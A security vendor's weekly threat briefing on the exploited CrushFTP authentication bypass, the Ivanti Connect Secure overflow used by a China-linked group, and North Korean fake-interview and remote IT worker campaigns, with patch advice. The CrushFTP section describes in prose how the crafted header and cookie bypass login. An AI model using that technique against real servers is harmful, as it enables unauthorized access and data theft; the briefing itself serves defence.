Weekly Threat Briefing: Mar 31 - Apr 4, 2025
Every week, eSentire’s Threat Response Unit (TRU) compiles the following threat intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
CrushFTP Authentication Bypass Vulnerability
Bottom Line: On March 28th, 2025, Proof-of-Concept (PoC) exploit code was released for CVE-2025-2825, a critical vulnerability within CrushFTP. As of April 1st, eSentire has identified real-world exploitation. It is crucial that organizations using CrushFTP upgrade to a secure version immediately.
On March 21st, CrushFTP disclosed CVE-2025-2825, a critical authentication bypass vulnerability that could allow an attacker to gain unauthorized access through remote, unauthenticated HTTP requests sent to the CrushFTP server. The exploitation attempts were observed soon after the release of Proof-of Concept (PoC) exploit code by ProjectDiscovery on March 28th.
CrushFTP is a widely used multi-protocol file transfer server. It facilitates file transfers via multiple protocols such as FTP, FTPES, SFTP, SCP, and HTTPS. On March 21st, CrushFTP alerted its customers about the critical authentication bypass vulnerability in the solution via email and issued a security update on the same day.
The vulnerability initially reported to CrushFTP by Outpost was assigned the CVE identifier CVE-2025-31161, but the lack of public disclosure led VulnCheck to assign CVE-2025-2825 to the same flaw on March 26th. Since then, CVE-2025-2825 has been the publicly recognized identifier for the vulnerability.
CVE-2025-2825 impacts CrushFTP versions 10.0.0 through 10.8.3 and versions 11.0.0 through 11.3.0 and successful exploitation of CVE-2025-2825 would allow for the theft of data stored on the vulnerable CrushFTP server. ProjectDiscovery states that exploiting the vulnerability is straightforward and requires minimal technical expertise.
An attacker only needs to craft an HTTP request with an AWS S3-style authorization header, including a valid username followed by a slash, and a random CrushAuth cookie matching c2f parameter values to breach the vulnerable CrushFTP server. The flaw resides in the loginCheckHeaderAuth() method of the code responsible for handling HTTP requests with S3-style authorization headers.
The vulnerability is patched in the CrushFTP versions 10.8.4 and later, and 11.3.1 and later. CrushFTP recommended that organizations should mitigate the shortcoming by updating to a patched version of the server. CrushFTP stated that servers with DMZ feature enabled are not affected by the vulnerability.
On March 30th, exploitation attempts were detected by the Shadowserver Foundation, and they confirmed that 1,512 unpatched CrushFTP servers were exposed to the Internet. Since April 1st, eSentire has identified multiple cases which involved attempted exploitation of CVE-2025-2825. eSentire has confirmed that either patching or enabling the DMZ feature, successfully prevents compromise via the exploit.
Authentication bypass vulnerabilities in file transfer systems are highly concerning, as they grant threat actors a simple access point from which sensitive data may be stolen. The data-extortion group CL0p has previously targeted similar authentication bypass, zero-day vulnerabilities in file transfer applications such as Cleo Managed File Transfer (MFT) solution, MOVEit File Transfer Application (FTA), GoAnywhere MFT, and Accelion FTA.
Organizations using CrushFTP server are recommended to perform business impact analysis and upgrade to a secure version (10.8.4 or later, and 11.3.1 or later) promptly. If patching is not feasible, organizations should ensure the DMZ feature is enabled on the vulnerable server until the patches are applied.
Here is how eSentire is responding to this threat:
eSentire’s Tactical Threat Response (TTR) team has developed new detections to identify exploitation attempts via eSentire MDR for Network.
eSentire's Threat Response Unit (TRU) has performed threat hunts across the eSentire customer base for known signs of exploitation and known malicious IP addresses have been added to eSentire’s Global Block List.
eSentire's Managed Vulnerability Service (MVS) has relevant plugins to detect devices vulnerable to CVE-2025-2825.
eSentire’s Threat Intelligence team has published an advisory addressing CVE-2025-2825 on April 1st, 2025, and is actively tracking this topic for additional details and detection opportunities.
Learn more in the full threat briefing here.
Critical Ivanti Connect Secure Vulnerability Exploited by China-Nexus Threat Actor
Bottom Line: A critical vulnerability in Ivanti Connect Secure, CVE-2025-22457 was observed to be exploited by Chinese state sponsored APT group UNC5221, to gain initial access to victim's network and deploy malware to further compromise it.
On April 3rd, 2025, Ivanti disclosed a critical vulnerability within the Ivanti Connect Secure VPN appliance, tracked as CVE-2025-22457 (CVSS: 9.0). CVE-2025-22457 is a stack-based buffer overflow vulnerability, which can lead to unauthenticated attackers achieving Remote Code Execution (RCE) when successfully exploited.
Within their advisory, Ivanti confirms that a security patch for the vulnerability was released on February 11th, 2025, and that the vulnerability impacts versions of Ivanti Connect Secure 22.7R2.5 and earlier. Ivanti confirms within the advisory that they are aware of a limited number of customers whose Ivanti Connect Secure VPN appliances have been exploited at the time of disclosure, but do not share any details on exploitation.
Ivanti indicates that the vulnerability was initially determined "not to be exploitable as remote code execution and didn’t meet the requirements of denial of service" but later learned that it is "exploitable through sophisticated means".
Also on April 3rd, Mandiant released a report providing details on exploitation of CVE-2025-22457, which Mandiant claims was first observed in March 2025, and attributed to the Chinese state-sponsored threat actor, UNC5221. Mandiant assesses that UNC5221 may have reverse engineered the patch that was initially released for the vulnerability in February 2025, where UNC5221 likely determined that exploitation of versions 22.7R2.5 and earlier was possible.
Upon successful exploitation, Mandiant reports that newly identified malware TrailBlaze and BrushFire were deployed through a shell script dropper, along with malware from the Spawn malware family. A shell script was first used to deploy TrailBlaze, an in-memory only dropper which uses system calls to deploy additional payloads. TrailBlaze is used to drop BrushFire, a passive backdoor used to execute shellcode. The deployment of malware from the Spawn family, specifically SpawnSloth, SpawnSnare, and SpawnWave, were attributed to UNC5221, and have been observed being deployed in similar attacks.
Organizations are strongly urged to implement robust patch management strategies, to ensure that updates to critical edge devices and infrastructure are applied within a timely manner.
Although there is currently no publicly available Proof-of-Concept (PoC) exploit code, which reduces the likelihood of widespread exploitation, organizations should apply relevant security patches to their Ivanti Connect Secure VPN appliance as soon as possible.
Plugins to identify versions of Ivanti Connect Secure vulnerable to CVE-2025-22457 via eSentire's Managed Vulnerability Service (MVS) are currently available.
Learn more in the full threat briefing here.
Recent DPRK Activity
Bottom Line: Recent reports on threat actors from the Democratic People's Republic of Korea (DPRK) provide new details on previously reported campaigns, specifically updates to the Contagious Interview campaign and the expansion of remote IT worker campaigns.
On March 31st, Sekoia released a report detailing a new campaign called ClickFake Interview. This campaign involves the use of fake job interview websites that utilize the ClickFix method to deploy the GolangGhost backdoor. Sekoia attributes this campaign to the North Korean APT group known as Lazarus, which is targeting centralized financial entities. The campaign was initially discovered during an investigation into Lazarus's attacks on the cryptocurrency industry. Sekoia believes that this new effort is a continuation of the Contagious Interview campaign previously reported by Palo Alto in 2023.
The ClickFake Interview campaign starts when a user receives a URL via social media, inviting them to a fake job interview website related to the cryptocurrency sector. The website prompts users to fill out a contact form and answer three open-ended questions about cryptocurrency.
Additionally, it suggests creating an introductory video and preparing for the interview. When the victim is asked to enable their webcam, they encounter an error message instructing them to download a driver to resolve the issue. At this point, the ClickFix technique is introduced, guiding the victim to open the Windows Run box and paste in a provided command line to update the drivers. Running this command downloads a VBScript for Windows users or a Shell script for macOS users, leading to the deployment of the GolangGhost backdoor.
GolangGhost is designed to steal sensitive web browser data, establish connections to Command-and-Control (C2) servers, and receive commands to perform further actions or execute additional payloads. It is important to note that on macOS, FrostyFerret stealer is used to obtain the user's system password.
Google’s Threat Intelligence Group published a report highlighting that the remote IT worker campaigns associated with DPRK threat actors are expanding in both scope and scale. According to Google, the United States remains the primary target for DPRK remote worker scams. However, it has become increasingly difficult for these actors to secure employment due to the release of details about their campaigns and heightened vigilance among organizations. As a result, North Korean threat actors are increasingly turning their attention to European organizations, where they have experienced a higher success rate.
In recent campaigns, DPRK actors have applied for positions in various fields, including web development, bot development, content management system (CMS) development, and blockchain technology. These threat actors often claim to be based in countries such as Italy, Japan, Malaysia, Singapore, Ukraine, the United States, and Vietnam, using a combination of fabricated and stolen identities. Additionally, facilitators who assist DPRK workers in obtaining employment, receiving funds, and circumventing identity verification have been identified in both the United States and United Kingdom.
The eSentire Threat Response Unit continues to conduct threat hunts related to known DPRK campaigns. Additionally, detections are in place for malware commonly used by DPRK threat actors.
eSentire researchers have conducted in-depth investigations into DPRK activity observed by eSentire, leading to the publication of two reports, Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure Part 1 and Part 2. The eSentire Tactical Threat Response (TTR) team has developed detections for the Clickfix IAV in eSentire MDR for Network.
The eSentire Threat Response Unit (TRU) has previously published an advisory and a TRU Positive blog on ClickFix distributing Lumma Stealer which includes detailed instructions on how such type of attacks can be prevented.
Learn more in the full threat briefing here.
About the eSentire Threat Response Unit (TRU)
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.